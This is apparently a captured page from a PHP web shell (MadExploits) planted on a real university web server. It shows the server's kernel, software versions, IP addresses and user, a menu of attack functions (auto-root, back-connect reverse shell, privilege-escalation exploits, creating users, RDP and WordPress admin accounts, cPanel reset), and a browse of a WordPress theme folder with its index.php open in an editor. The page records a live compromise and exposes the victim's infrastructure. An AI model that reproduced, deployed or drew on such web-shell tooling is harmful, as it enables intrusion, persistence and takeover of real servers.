Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.227.140.100
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-content /
themes /
eventalk /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
template-parts
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
woocommerce
[ DIR ]
drwxrwxr-x
404.php
1016
B
-rw-rw-r--
comments.php
4.23
KB
-rw-rw-r--
fallback.php
915
B
-rw-rw-r--
footer.php
363
B
-rw-rw-r--
functions.php
2.32
KB
-rw-rw-r--
header.php
3.22
KB
-rw-rw-r--
index.php
1.76
KB
-rw-rw-r--
page.php
1.02
KB
-rw-rw-r--
screenshot.png
235.13
KB
-rw-rw-r--
search.php
1.08
KB
-rw-rw-r--
sidebar.php
455
B
-rw-rw-r--
single-eventalk_event.php
1.46
KB
-rw-rw-r--
single-eventalk_speaker.php
1.07
KB
-rw-rw-r--
single.php
1.02
KB
-rw-rw-r--
style-editor.css
15.59
KB
-rw-rw-r--
style.css
834
B
-rw-rw-r--
wpml-config.xml
1.75
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.0 */ namespace radiustheme\Eventalk; use \WP_Query; // CPT Redirection $cpt = THEME_CPT_PREFIX; if ( is_post_type_archive( "{$cpt}_speaker" ) || is_tax( "{$cpt}_speaker_category" ) ) { get_template_part( 'template-parts/archive', 'speakers' ); return; } if ( is_post_type_archive( "{$cpt}_event" ) || is_tax( "{$cpt}_event_category" ) ) { get_template_part( 'template-parts/archive', 'event' ); return; } // Layout class if ( RDTheme::$layout == 'full-width' ) { $layout_class = 'col-sm-12 col-xs-12'; $post_class = 'col-lg-4 col-md-6 col-sm-6 col-xs-12 no-equal-item'; } else{ $layout_class = 'col-md-9 col-xs-12'; $post_class = 'col-lg-6 col-md-6 col-sm-6 col-xs-12 no-equal-item'; } ?> <?php get_header(); ?> <div id="primary" class="content-area"> <div class="container"> <div class="row"> <?php if ( RDTheme::$layout == 'left-sidebar' ) { get_sidebar(); } ?> <div class="<?php echo esc_attr( $layout_class );?>"> <main id="main" class="site-main site-index"> <?php if ( have_posts() ) :?> <?php echo '<div id="no-equal-gallery" class="row">'; while ( have_posts() ) : the_post(); echo '<div class="' . $post_class. '">'; get_template_part( 'template-parts/content-masonry', get_post_format() ); echo '</div>'; endwhile; echo '</div>'; ?> <div class="mt50"><?php Helper::pagination();?></div> <?php else:?> <?php get_template_part( 'template-parts/content', 'none' );?> <?php endif;?> </main> </div> <?php if ( RDTheme::$layout == 'right-sidebar' ) { get_sidebar(); } ?> </div> </div> </div> <?php get_footer(); ?>
Close